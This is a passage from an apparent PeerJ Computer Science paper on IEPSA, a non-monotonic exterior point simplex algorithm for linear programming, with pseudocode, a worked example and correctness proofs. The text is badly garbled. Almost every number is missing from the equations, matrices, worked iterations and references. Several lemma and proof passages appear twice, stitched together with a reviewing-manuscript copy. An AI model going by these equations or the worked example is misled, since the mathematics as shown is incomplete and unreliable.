in the ‘proof of correctness’ subsection, mathematical proofs for the correctness of the algorithm are given. in order to gain an insight into the practical behavior of the proposed algorithm, we performed a computational study. these results are presented in the ‘results’ section, followed by the ‘conclusions’ section. triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. materials & methods in this section we give some necessary notation and definitions on lps. consider the following linear program in the standard form: min ct x subject to ax =b, x ≥ ( ) where a∈rm×n, (c,x)∈rn, b∈rm and t denotes transposition. we assume that a has full rank, rank(a)=m, ≤m≤n. if x satisfies ax =b, x ≥ , then x is a feasible solution. the dual problem associated with the eq. ( ) is presented in eq. ( ): max bt y subject to at y+s=c, s≥ ( ) where y ∈rm and s∈rn. using a basic partition (b,n) of a as a=[aban] and the corresponding partitioning of xt =[xbxn], ct =[cbcn], eq. ( ) is written as: min z =ctb xb+c t n xn subject to abxb+an xn =b xb,xn ≥ ( ) in eq. ( ), ab is an m×m non-singular sub-matrix of a, called basic matrix or basis, whereas an is an m×(n−m) sub-matrix of a called non-basic matrix. the columns of a which belong to subset b are called basic and those which belong to n are called non-basic. the solution xb = (ab)− b, xn = is called a basic solution. the solution of eq. ( ) is computed by the relation s=c−at y, where yt =(cb)t (ab)− are the dual variables and s are the dual slack variables. the basis ab is dual feasible iff s≥ . the ith row of the coefficient matrix a is denoted by ai. and the jth column by a.j. notation xb[i] refers to the ith basic variable (ith element of vector xb). in solving lps by pivoting methods, a huge amount of computational effort is consumed on the inversion of the basis ab. the basis is maintained in some factorized form. we use the lu-factorization available in matlab to compute the inverse of the basis in all three algorithms, iepsa, epsa and pdipsa. the iepsa method a common characteristic of the majority of simplex-type algorithms is that they can be described as a process that uses simplex paths which lead to optimal solution. one advantage of the exterior point algorithms is that they use two paths to reach the optimal basis. one is feasible and the other infeasible (exterior). the relaxation of the feasibility constraints seems to be efficient in practice. another potential advantage of epsa is that should the initial direction be feasible (it spans the feasible region), the method can be applied directly on the original problem, without having to first compute an initial feasible basic solution thus completely avoiding phase i. this is because epsa never loses contact with the feasible region if the initial direction crosses it. on the other hand, one triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the main disadvantages of the epsa is the difficulty of constructing a good moving direction. this drawback can be avoided if the exterior path is replaced with a dual feasible simplex path. it has been shown that by replacing the exterior path of an epsa with a dual feasible simplex path results in an algorithm free from the computational disadvantages of epsa (paparrizos, samaras & stephanides, b). a more effective version is the pdipsa (samaras, ). this algorithm can circumvent the problems of stalling and cycling more effectively and as a result improves the performance of the primal-dual exterior point algorithms. the advantage of pdipsa emanates from the fact that it uses an interior point. the iepsa method is initialized with a pair of initial points: an infeasible basic solution and an interior point. the initial interior point (xinterior) can be computed by applying an ipm in eq. ( ) with ct = . next, it constructs a feasible direction (d =xinterior −xcurrent ) and computes the pair of entering/leaving variables and a new (better) interior point. the above computations continue, swapping infeasible basic solutions on the exterior of the feasible region in a non-monotonic way, and in the interior by using better interior points (monotonic movement) in order to construct the search directions. the proposed method prioritizes monotonic pivots; however, should there be no monotonic eligible steps, the method moves to the least-worse non-monotonic infeasible basic solution. if iepsa finds a primal feasible basic solution, then the epsa is applied to monotonically converge to the optimal solution. if at any given iteration iepsa moves to a dual feasible partition then pdipsa is applied. with the last interior point and the dual feasible partition from iepsa, pdipsa can also monotonically find the optimal solution. step-by-step description of iepsa and pseudocode the algorithm consists of two phases. in the first phase, the algorithm generates a sequence of points (xiinterior,x i exterior), i= , , ,...,t , where x i interior is a point in the relative interior of the feasible region for i= ,...,t , and xiexterior is a basic solution to lp, that is infeasible to both the primal and the dual problem for i= ,...,t − . the first phase ends with a pair (xtinterior,x t exterior), where the exterior point is either feasible to the primal or the dual problem. if the first phase ands with a basic feasible solution to the primal, then the second phase runs an algorithm called exterior point simplex algorithm (epsa) from previous literature (paparrizos, ), to obtain the optimal basic feasible solution. if the first phase ends with a dual feasible solution, the second phase runs an algorithm called primal-dual interior point simplex algorithm (pdipsa), also from previous literature (samaras, ). we show that the first phase method always ends with a basic solution that is feasible to either the primal or the dual problem. thus, using the prior results on epsa and pdipsa, the overall algorithm is shown to correctly solve lp. the main idea behind the first phase is the following: the algorithm is ini- tialized with any basic (infeasible) solution x exterior and an interior point x interior, triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. found by a standard interior point solver (in this case mosek ipm). at ev- ery iteration, i = , , ,... one computes the intersection of the line passing data: eq. ( ), infeasible basic partition [b n], interior point xinterior result: primal or dual feasible basic partition [b n] (initialization) compute: (ab)− ,xb,wt,(sn )t xcurrent = [ xb xn ] d =xinterior −xcurrent p = { j∈n : sj < } , q= { j∈n : sj ≥ } (sp)t =(cp)t −wt ap , (sq)t =(cq)t −wt aq (general loop) while xb( ≥ ) do αα=xcurrent +αd : α= xb[ra] −db[ra] =min { xb[i] −db[i] :db[i]< } ,∀i= ,...,m ββ=xcurrent +βd : β= xb[rb] −db[rb] =max { xb[i] −db[i] :xb[i]< } ,∀i= ,...,m if α=+∞ then stop-eq. is unbounded. else find xmiddle = αα+ββ if ct xmiddle <ct xinterior then xinterior =xmiddle else if ct xmiddle =ct xinterior then α=min { (xinterior )[i] c[i] :−c[i]< } xinterior =xinterior + α (−c t ) else d =xinterior −xmiddle α=min { (xinterior )[i] −(d)[i] :(d)[i]< } xinterior =xinterior + α d end if end if compute: xb[rb]=xk hrp =((ab) − )rb.ap hrq =((ab) − )rb.aq, θ = −sp hrp =min { −sj hrj :hrj < ,j∈p } θ = −sq hrq =min { −sj hrj :hrj < ,j∈q } (pivot-update) find t ,t : p(t )=p , q(t )=q. if θ ≤θ then l =p. else l =q end if find t : n(t)= l. set n(t)=k , b(rb)= l . update: (ab)− , xb,wt,(sn )t,(sp)t,(sq)t , p,q, xcurrent = [ xb xn ] , d =xinterior −xcurrent end if end while algorithm : iepsa triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flow diagram of iepsa. full-size doi: . /peerjcs. /fig- through xiexterior and x i interior with the feasible region. this gives a line segment l (assuming the problem is bounded) with midpoint ximiddle. otherwise, one takes a half-step from the current xiinterior in the direction of x i middle and sets this as the new x i+ interior. one also computes the endpoint of the line segment l closest to xiinterior. this endpoint lies on some facet of the feasible region. this facet dictates which nonbasic variable will enter the basis and an appropriate exiting variable is selected. this then gives the new basic solution xi+ exterior. a flow diagram of iepsa combined with epsa and pdipsa to provide an integrated solver for lp is shown in fig. . a formal description of the iepsa method is given in algorithm . an example we will briefly demonstrate the iepsa method in a simple example. points {αα,ββ} represent the exiting and entering boundary points correspondingly for each feasible direction spanning the polyhedron. assume we are given the following linear programming problem: max z =x + x subject to x − x ≤ −x + x ≤ x + x ≤ − x − x ≤ − x − x ≤ − x − x ≤ xi ≥ ,∀i∈{ , } ( ) the corresponding feasible region is depicted in fig. . there exist in total eight different variables after the addition of the slack ones. the axis system represents variables x (y= ) and x (x= ). the numbers with p in brackets on the right at each basic solution stand for the number of elements in vector p. the optimal point is [ , . ] and the optimal objective triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure feasible region and duality on vertexes for eq. ( ). full-size doi: . /peerjcs. /fig- value is z = . . after the addition of the slack variables we have: a=   − − − − − −   ,c = [ − ,− , , , , , , ] ,b=   − −   initialization assume we start with the infeasible partition b=[ , , , , , ], n =[ , ] and the following interior point xinterior (calculated from mosek’s ipm). all the appropriate computations are: (ab) − =   . − . . . − .   ,(sn ) t = [ . ,− . ] ,wt = [ , , , . , , ] triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. xb=   − . . . − . . −   ,xcurrent =   . − . . . − . −   ,xinterior =   . . . . . . . .   here w are the dual variables. the n set of indexes actually represents the current non-basic solution. in our case [ , ] is the -d point [ . , ]. a feasible direction d is then constructed by connecting the interior point with the infeasible basic solution: d =xinterior −xcurrent =   . . . . . . . .   −   . − . . . − . −   =   − . . . − . . . . .   mapping now the direction d on the basic variables we get db: db=   . − . . . − . .   also we have p =[ ]and q=[ ]. the direction from the initial infeasible basic solution ( . , ) to the interior point is shown in fig. . since xcurrent is our initial infeasible basic solution and d is our current feasible direction, this direction intersects the feasible region at an exiting point aa (as shown in fig. ) which can be calculated using the relations below: general loop - iteration α= xb[r] −db[r] =min { xb[i] −db[i] :db[i]< } =min { xb[ , ] −db[ , ] } =min { . . , . . } = min{ . , . }= . triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure constructing the first direction for eq. ( ). full-size doi: . /peerjcs. /fig- αα=xcurrent +αd =   . − . . . − . −   + .   − . . . − . . . . .   =   . . . . . . .   in a similar manner, the entering point bb (as shown in fig. ) can be calculated using a maximum ratio test: β= −xb[r] db[r] =max { −xb[i] db[i] :xb[i]< } =max { −xb[ , , ] db[ , , ] } = max { − . − . , − . − . , − − . } =max{ . , . , . }= . hence, rb = , then the rd element of [ , , ] is r = . the entering point then is: ββ=xcurrent +βd =   . − . . . − . −   + .   − . . . − . . . . .   =   . . . . . . .   triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. it is easy now to compute the middle point middle (as shown in fig. ) between αα−ββ: xmiddle = αα+ββ =   . . . . . . . .   we observe the following: • both exiting and entering points have only one zero element which was expected since both points are boundary in a -d problem • maximum step size β is less than the minimum step α so as the entering point is closer to the infeasible basic solution and the exiting furthest as expected, since the direction will intersect the feasible region • these two boundary points define a unique feasible ray segment from ββ to αα (ββ→αα) • the objective function value at ββ is better than in αα (direction is non-improving) and the objective function value at the middle point is better than the initial interior point. since the middle point has better objective value than the initial interior point (it is: zmiddle = (ct middle)=[− . ,− . ]=− . and zxinterior = (c t xinterior)= [− . ,− . ]=− . ) we keep this middle point as an improved interior point for the next iteration. we now choose the leaving variable according to ββ boundary point: k= ,r = . the variable xb(r)=xk =x is leaving the basis. we can now move on, to select the entering variable xl: hrp =b − a.p =[ ]> hrq=b − a.q=[− ]< l = ,t = ,p =[ ],q=[ ] θ =[ ],θ =[ . ] since only θ could be computed, the selection is done using the set q. variable xl =x is entering the basis. the pivot operation now updates the basic and non-basic index lists triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as shown below: b= [ , , , , , ] ,n = [ , ] ,(ab) − =   − . − . . . . − . − . − . − . . − . − .   , (sn ) t = [ . ,− . ] ,wt = [ , , , . , ,− . ] , xb=   . . . − . . .   ,xcurrent =   . . . . . − .   note that xb≤ in this pivot. the new direction d =xmiddle−xcurrent now is: d =   . . . . . . . .   −   . . . . . − .   =   − . . . − . − . . . .   h⇒db=   . − . − . . − . .   general loop: iteration the new exiting boundary point aa (as shown in fig. ) is: α= xb[r] −db[r] =min { xb[i] −db[i] :db[i]< } =min { xb[ , , ] −db[ , , ] } =min { . . , . . , . . } =min{ . , . , . }= . αα=xcurrent +αd =   . . . . . − .   + .   . . . − . − . . . .   =   . . . . . .   triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure constructing the second direction for eq. ( ). full-size doi: . /peerjcs. /fig- correspondingly, the entering point bb (as shown in fig. ) can be calculated using the maximum ratio test: β= −xb[r] db[r] =max { −xb[i] db[i] :xb[i]< } =max { −xb[ ] db[ ] } =max { − . − . } = . hence, rb= so r = . the entering point then is: ββ=xcurrent +βd =   . . . . . − .   + .   − . . . − . − . . . .   =   . . . . . . .   the new middle point middle (as shown in fig. ) between αα−ββ is now: xmiddle = αα+ββ =   . . . . . . . .   the variable xb(r)=xk =x ,r = is leaving the basis. we can now move on to select the entering variable xl: triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. p =[ ],q=[ ] hrp =(ab) − a.p =[− . ]< hrq=(ab) − a.q=[− . ]< l = ,t = ,p =[ ],q=[ ] θ =[− . ],θ =[ . ] since θ ≤θ the selection is done using the set p. variable xl =x is entering the basis. the pivot operation now updates the basic and non-basic index lists as shown below: b= [ , , , , , ] ,n = [ , ] (ab) − =   − . − . . . . − . − . . − . . − . .   ,(sn ) t = [ . ,− . ] , wt = [ , , , , . ,− . ] ,xb=   . . . . . .   note that xb≥ in this pivot. method iepsa stops here. the basic solutions constructed as shown in fig. are c →g→a . in practice, epsa would take over and finish the optimization moving with one extra iteration to the optimal vertex from the feasible vertex a . note that in the second pivot, the middle point (middle ) constructed could have worse objective function than middle (although it seems better in this case). we did not calculate it on purpose here, since the second basic solution constructed is feasible. the sequence of the objective function value at each pair of basic solutions with the corresponding interior points is shown below: basic solutions : [ . , . , . ] interior points : [ . → improved → . . → improved → . ] . proof of correctness the proposed method consists of three different algorithms. besides iepsa (the non- monotonic part), the rest two (epsa and pdipsa) have been already proven to be correct triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and finite. for more details see (paparrizos, samaras & stephanides, a; paparrizos, samaras & stephanides, b). since the nature of the iepsa is non-monotonic, the finiteness cannot be verified by proving that the algorithm improves the objective function value at each iteration. therefore iepsa’s finiteness relies on the non-cycling property. we will now use the same notation used in zhang ( ) in respect to sign-properties and simplex tableau. later on we will adjust to what is proven in fukuda & terlaky ( ) and explain how this portion of information affects iepsa’s finiteness. with respect to the basic partition [bn] we call the following augmented matrix a simplex tableau: where: ∣∣aij∣∣|b|×|n|=(ab)− an {sj|j∈n}=(cn ) t −(cb) t (ab) − an {xi|i∈b}=(ab) − b z =(cb) t (ab) − b it is well known, that if xb ≥ the basis is primal feasible. if sn ≥ the basis is dual feasible. if both apply, the current basis is optimal. no primal or dual feasibility is required in iepsa, and the value of the objective function does not improve necessarily in a monotonic way. let us start by focusing on the correctness first. we have to prove that at each iteration, an available pivot is always given. this actually means that both the selection of the entering and leaving variables are well defined. first let us provide a series of proofs about the monotonicity of the interior point that iepsa uses to construct the feasible direction at each iteration. lemma a direction from an infeasible (exterior) point to an interior one, intersects the feasible region into a unique pair of entering/leaving points. proof assume the polyhedron x ={x|ax ≥b}. let points αα,ββ be computed as presented in iepsa algorithm: αα=xcurrent +αd ββ=xcurrent +βd since xinterior and points αα,ββ lie on the same direction, the linear combination of the interior point is: xinterior =λαα+( −λ)ββ > , λ∈( , ). triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. so for each element i of xinterior the following applies: (λaai+( −λ)bbi)> ,(λ> ),∀i= ,...,m (aai+bbi)> so there is no index i for which both elements in αα,ββ are equal to zero. this means that points αα,ββ lie on a different hyperplane of the feasible region. lemma given a pair of a primal infeasible basic solution xcurrent and an interior point xinterior, the direction d = xinterior −xcurrent intersects the feasible region into a pair of leaving/entering αα,ββ boundary points and the middle point xmiddle = αα+ββ is also interior. proof we will use the contradiction method. assume that xmiddle is not interior. from lemma we know that the entering ββ≥ and leaving αα≥ boundary points are not the same. for the middle point we have: xmiddle = αα+ββ ≥ since xmiddle is not an interior point, there exists at least one element i equal to zero: ααi+ββi = which contradicts with lemma . so xmiddle is interior (xmiddle > ). lemma from a given interior point, the half step of the minimum ratio test computed for any given descending direction results to a strictly better interior point. proof let xinterior be the first interior point. for a given descending direction d, its widely know that the minimum ratio test computes the largest step we can move alongside the direction d while preserving feasibility. we get: α= xb[ra] −db[ra] =min { xb[i] −db[i] :db[i]< } ,∀i= , ,...,m. the new interior point is: xinterior =xinterior + α d. suppose now that xinterior is not strictly better. we have: ct xinterior ≤c t xinterior ⇔ ct xinterior −c t xinterior ≤ ⇔ ct (xinterior −xinterior)≤ if we substitute xinterior we take: ct (xinterior −xinterior − α d)≤ ⇔− α ct d ≤ which is a contradiction since d < . hence, the new interior point xinterior has a better objective value. lemma at each iteration of iepsa, the direction d intersects the feasible region. triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proof lemmas , and immediately imply that at each iteration we construct the direction towards an interior point. thus, each direction intersects the feasible region. theorem at each iteration of iepsa, the objective value at the interior point xinterior strictly decreases. proof iepsa starts by constructing the direction towards an interior point. lemma implies that the entering and leaving points for this direction are not the same. the algorithm then constructs at each iteration the middle point of the entering feasible ray segment. lemma shows that this point will also be interior. it then compares the two interior points and acts accordingly to secure the construction of a better interior point. by exploiting the non-monotonicity on the infeasible basic solutions that result in middle-interior points worse than in previous iterations and as a result offering a descending direction between these two we can still provide improvement on the interior point. lemma promotes the monotonicity in the interior of the feasible region. we will prove each case by induction. the possible combinations for the objective function value between points xmiddle and xinterior are shown below: • ct xmiddle <ct xinterior: this case is trivial to examine. we directly acquire a better interior point due to the relational geometric position of the points. • ct xmiddle =ct xinterior: since the objective function’s value is same on both points, they either match or lie on a hyperplane vertical to the objective function vector c. we use d =−c in that case, since the latter is a descending direction, as no direction can be constructed between the two points. using lemma the new interior point will have better objective function value than the previous one. • ct xmiddle >ct xinterior: we have ct xmiddle >c t xinterior ⇔ ct xinterior −c t xmiddle < ⇔ ct (xinterior −xmiddle) < ⇔ ct d < so it stands that the direction d =xinterior −xmiddle is a descending direction. according to lemma the interior point which will be constructed in the next iteration using the half of the minimum ratio step from point xinterior will be better. so in this case a better interior point is also constructed. for all the possible combinations an improved interior point can be constructed. thus iepsa uses monotonicity in interior points. lemma at each iteration of iepsa, a leaving variable is always eligible. triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proof assume that at some iteration, xinterior > is the current point and xcurrent < is the current infeasible basic solution. from the constraints of eq. ( ) we have: (axcurrent =b and axinterior =b)⇔ axinterior =axcurrent ⇔ axinterior −axcurrent = ⇔ a(xinterior −xcurrent )= ⇔ ad = hence d is a direction. the maximum ratio test is then given by: β= −xb[r] db[r] =max { −xb[i] db[i] :xb[i]< } ,∀i= , ,...m and we now need to prove that β > . we have d =xinterior −xcurrent , and for xcurrent < since xinterior > , it follows that d > . thus there exist columns in the maximum ratio test that will be positive, so β > is computable. lemma if a pivot from an infeasible basic solution b→b′ to another is admissible for iepsa, then the inverse b′→b is not. proof first we will analyze the sign properties of the algorithm. assume that k is the leaving variable (k∈b), l is the entering one (l ∈n). the difference in objective function’s value between two consecutive extreme points [b,n] and [ b′,n ′ ] is given by: z′−z = z =(sn )l(xb′)l. we know also that the revised updating equation for the basic solution xb is: xb′ =xb− f g hl,where f =xb(r),g =hrl,h.l =(ab) − a.l the algorithm selects the entering variable so as hrn =[hrp hrq] < , thus hrl =g < . this means that the conjunction of the pivot row and column, the pivot element, is always negative for iepsa. for the pivot row it also applies that hrl =− ,xb(r)=xk = . so: xb(l)′ =xl = f g = < < > . this means that the leaving variable will be replaced by a positive one after the pivot. since the pivot from b′→b is reverse to b→b′, the leaving variable of the first pivot cannot be selected immediately as leaving for the next pivot since it needs to be negative (as a reminder, the leaving variable is selected always by using the maximum ratio test, thus always negative). lemma if iepsa selects the entering variable from set p then the step is monotonic. if it is from set q then the step is non-monotonic. triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure . pivot type i (set p). sl −z ⋆ ⋆ ··· ⋆ ⋆ − ⋆ ⋆ ... ... ⋆ ⋆ xk − ⋆ ⋆ ··· ⋆ ⋆ − figure . pivot type ii (set q). sl −z − ⋆ ··· − ⋆ + ⋆ ⋆ ... ... ⋆ ⋆ xk − + ⋆ ··· + ⋆ − when the selection is done from sets p and q respectively, and since: p = { j ∈ n : s j < } and q = { j ∈ n : s j ≥ } we have (via the positivity of the leaving variable on the adjacent basic solution of lemma ): p =⇒ ∆z = z′ − z = sl xl = (−)(+) < q =⇒ ∆z = z′ − z = sl xl = (+)(+) > the sign properties previously proved result into the following unique pair of pivot types, depicted in figures and . to select an entering variable from set q (thus pivot of type ii), automatically means that either hrp ≥ , or p = Ø). lemma the selection of the entering variable for iepsa is well defined. in (fukuda and terlaky, ) three types of terminal tableau for a linear problem are defined. those are considered to be terminal because they define three different terminal states for a lp: i) optimality ii) primal-inconsistency iii) dual-inconsistency. we emphasize on the second one shown here: − ⊖ ··· ⊖ notice that since the leaving variable xk = xb(r) is always negative for iepsa, and terlaky is using d = −(ab)− an , this tableau version has opposite signs of what iepsa uses for the pivot row (hrn = (ab)− r an ). we know that iepsa selects an entering variable with hrn = [ hrp hrq] < , thus the pivot row on this terminal tableau matches the case where hrn ≥ for iepsa. this would be a deadlock for iepsa, a case where no eligible entering variable could be detected (all pivot elements positive or zero). as a result, this terminal tableau cannot occur in iepsa run time, since iepsa is only applicable on feasible lps as it requires an initial interior point to initialize, and this terminal tableau reveals infeasibility of the primal problem. / peerj comput. sci. reviewing pdf | (cs- : : : : :new feb ) manuscript to be reviewedcomputer science figure pivot type i (set p). full-size doi: . /peerjcs. /fig- figure . pivot type i (set p). sl −z ⋆ ⋆ ··· ⋆ ⋆ − ⋆ ⋆ ... ... ⋆ ⋆ xk − ⋆ ⋆ ··· ⋆ ⋆ − figure . pivot type ii (set q). sl −z − ⋆ ··· − ⋆ + ⋆ ⋆ ... ... ⋆ ⋆ xk − + ⋆ ··· + ⋆ − when the selection is done from sets p and q respectively, and since: p = { j ∈ n : s j < } and q = { j ∈ n : s j ≥ } we have (via the positivity of the leaving variable on the adjacent basic solution of lemma ): p =⇒ ∆z = z′ − z = sl xl = (−)(+) < q =⇒ ∆z = z′ − z = sl xl = (+)(+) > the sign properties previously proved result into the following unique pair of pivot types, depicted in figures and . to select an entering variable from set q (thus pivot of type ii), automatically means that either hrp ≥ , or p = Ø). lemma the selection of the entering variable for iepsa is well defined. in (fukuda and terlaky, ) three types of terminal tableau for a linear problem are defined. those are considered to be terminal because they define three different terminal states for a lp: i) optimality ii) primal-inconsistency iii) dual-inconsistency. we emphasize on the second one shown here: − ⊖ ··· ⊖ notice that since the leaving variable xk = xb(r) is always negative for iepsa, and terlaky is using d = −(ab)− an , this tableau version has opposite signs of what iepsa uses for the pivot row (hrn = (ab)− r an ). we know that iepsa selects an entering variable with hrn = [ hrp hrq] < , thus the pivot row on this terminal tableau matches the case where hrn ≥ for iepsa. this would be a deadlock for iepsa, a case where no eligible entering variable could be detected (all pivot elements positive or zero). as a result, this terminal tableau cannot occur in iepsa run time, since iepsa is only applicable on feasible lps as it requires an initial interior point to initialize, and this terminal tableau reveals infeasibility of the primal problem. / peerj comput. sci. reviewing pdf | (cs- : : : : :new feb ) manuscript to be reviewedcomputer science figure pivot type ii (set q). full-size doi: . /peerjcs. /fig- proof when the selection is done from sets p and q respectively, and since: p = { j∈n : sj < } and q= { j∈n : sj ≥ } we have (via the positivity of the leaving variable on the adjacent basic solution of lemma ): p h⇒ z =z′−z = slxl =(−)(+)< qh⇒ z =z′−z = slxl =(+)(+)> the sign properties previously proved result into the following unique pair of pivot types, depicted in figs. and . to select an entering variable from set q (thus pivot of type ii), automatically means that either hrp ≥ , or p =Ø). lemma the selection of the entering variable for iepsa is well defined. in fukuda & terlaky ( ) three types of terminal tableau for a linear problem are defined. those are considered to be terminal because they define three different terminal states for a lp: (i) optimality (ii) primal-inconsistency (iii) dual-inconsistency. we emphasize on the second one shown here: triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. proof notice that since the leaving variable xk =xb(r) is always negative for iepsa, and in fukuda & terlaky ( ) d=−(ab)− an , this tableau version has opposite signs of what iepsa uses for the pivot row (hrn =(ab)− r an ). we know that iepsa selects an entering variable with hrn =[hrp hrq] < , thus the pivot row on this terminal tableau matches the case where hrn ≥ for iepsa. this would be a deadlock for iepsa, a case where no eligible entering variable could be detected (all pivot elements positive or zero). as a result, this terminal tableau cannot occur in iepsa run time, since iepsa is only applicable on feasible lps as it requires an initial interior point to initialize, and this terminal tableau reveals infeasibility of the primal problem. following the insight of what is stated in fukuda & terlaky ( ), we will now prove that iepsa will never reach a deadlock, a case where the method is forced to cycle. we first need a definition: definition: we call redundant a constraint in a lp which represents geometrically a half- space implied already by other constraint(s). thus, a redundant constraint can be eliminated from the original lp without altering the equivalence of its initial feasible region. theorem method iepsa cannot reach a cycling deadlock. proof the near-terminal tableau of type b as shown in fig. in fukuda & terlaky ( ), actually means that the entering variable represents a redundant constraint. however in terms of iepsa sign properties, this translates into: (i) negative leaving variable xk (ii) pivot row: hrn =(ab)− r an ≥ except for the entering variable xl, which gives (hrn ).l < . this means that only one entering variable is eligible. we now move onto proving that vector hrn cannot contain only one negative element in the general case of cycling. the cycling example that we will analyze is minimal; each variable in the cycle became entering and leaving only once. this near-terminal tableau means that the constraint represented by variable l is a redundant constraint for the primal problem. let us assume the general case, where cycling occurred as shown in fig. . for simplicity, we depict basic solutions as nodes in a graph. each oriented arrow represents an admissible pivot for iepsa except for the one(s) in red color. a cycling assumption implies a case where the algorithm began on basic solution like node , moved after a finite number of pivots to node n and then again to , thus producing a cycle. all variables involved into the cycle changed basic/nonbasic status at least once. assume the pivot from ( →n) is given by the pivot operation xk,sl where k is the index of the leaving variable, and l the index of the entering one. the step (n→ ) was admissible by the algorithm, the sign properties apply, so on basic solution , xk > , and of course on n, xl < (via lemma ). it is now also clear that ( →n) cannot be admissible for triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. following the insight of what is stated in (fukuda and terlaky, ), we will now prove that iepsa will never reach a deadlock, a case where the method is forced to cycle. we first need a definition: definition: we call redundant a constraint in a lp which represents geometrically a half-space implied already by other constraint(s). thus, a redundant constraint can be eliminated from the original lp without altering the equivalence of its initial feasible region. theorem method iepsa cannot reach a cycling deadlock. the near-terminal tableau of type b as shown in figure in (fukuda and terlaky, ), actually means that the entering variable represents a redundant constraint. however in terms of iepsa sign properties, this translates into: i) negative leaving variable xk ii) pivot row: hrn = (ab)− r an ≥ except for the entering variable xl , which gives (hrn).l < . this means that only one entering variable is eligible. we now move onto proving that vector hrn cannot contain only one negative element in the general case of cycling. the cycling example that we will analyze is minimal; each variable in the cycle became entering and leaving only once. l ∈ n z ⋆ ⋆ ··· ⋆ ⋆ ⋆ ⋆ ⋆ ... ... ⋆ ⋆ k ∈ b − + + + + + − figure . near terminal tableau type b. this near-terminal tableau means that the constraint represented by variable l is a redundant constraint for the primal problem. let us assume the general case, where cycling occurred as shown in figure . for simplicity, we depict basic solutions as nodes in a graph. each oriented arrow represents an admissible pivot for iepsa except for the one(s) in red color. a cycling assumption implies a case where the algorithm began on basic solution like node , moved after a finite number of pivots to node n and then again to , thus producing a cycle. all variables involved into the cycle changed basic/nonbasic status at least once. assume the pivot from ( → n) is given by the pivot operation xk,sl where k is the index of the leaving variable, and l the index of the entering one. the step (n → ) was admissible by the algorithm, the sign properties apply, so on basic solution , xk > , and of course on n, xl < (via lemma ). it is now also figure . the general case of cycling. / peerj comput. sci. reviewing pdf | (cs- : : : : :new feb ) manuscript to be reviewedcomputer science figure near terminal tableau type b. full-size doi: . /peerjcs. /fig- the algorithm (although ,n are obviously neighbors) via lemma . however, somewhere before visiting node n, variable k, changed status and left the basis (in order to be eligible as entering on the last node n). now, since the algorithm always selects leaving variables throughout a max-ratio test, it’s obvious that all leaving variables are hyperplanes of the feasible region. thus all leaving variables selected by the algorithm are non-redundant, as removing either of them would result to a new lp which would not be equivalent to the previous one. if we assume that there is only one pivot admissible by the sign properties of the algorithm on node n (that is, moving to ), this means that the tableau on that pivot has a negative leaving variable and, there is only one negative element in the pivot row hrn . however according to fukuda & terlaky ( ), this is a near-terminal tableau of type b. it means that the constraint that the entering variable represents, is a redundant one for the primal problem. since the entering variable k on n, is already known to be leaving in some previous iteration, and all leaving variables are non-redundant in this algorithm this is a contradiction. this near-terminal tableau of type b tableau can never appear for an entering variable that has already previously served as an outgoing. the algorithm as shown in fig. from n can either move to n→ or to , since n is a neighbor to and is a neighbor to , then n is potentially a neighbor to . if not a neighbor, the pivot would not be admissible anyhow to assume a case of cycling. additionally, node n− is excluded as via lemma the backwards pivot is non-admissible, since the forward was. the direct backwards pivot to n→ is not possible via lemma . so the algorithm can again theoretically cycle with now. we extract the following scenario depicted in fig. : the pivots → ,n→ ,n→ in the case of cycling are all admissible. via lemma , we know that the leaving variable is always negative, and always being substituted by a positive one on the pivot. since → is admissible, k ≤ . since n→ is also admissible, k ≤ as well. but in the pivot n→ , variable k must be substituted at node with a positive variable, and the substitution here is k . however since → is admissible, again k ≤ must apply; contradiction. this case can only take place if → ,n→ are admissible pivots, but the pivot element for n→ is positive, which is not applicable for iepsa, so as the returning variable k can triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the general case of cycling. full-size doi: . /peerjcs. /fig- figure supposing cycling was possible even for the only second alternative entering variable, this scheme must apply. full-size doi: . /peerjcs. /fig- be again negative. this means that the pivot n→ is both ways non-admissible for iepsa if this applies. results computational studies can provide preliminary results on the computational behavior of an algorithm, thus enabling us to gain insight of its performance in different types of lps. the most popular types of test instances available for computational experiments are instances from real world applications. the test bed used in the computational study was triantafyllidis and samaras ( ), peerj comput. sci., 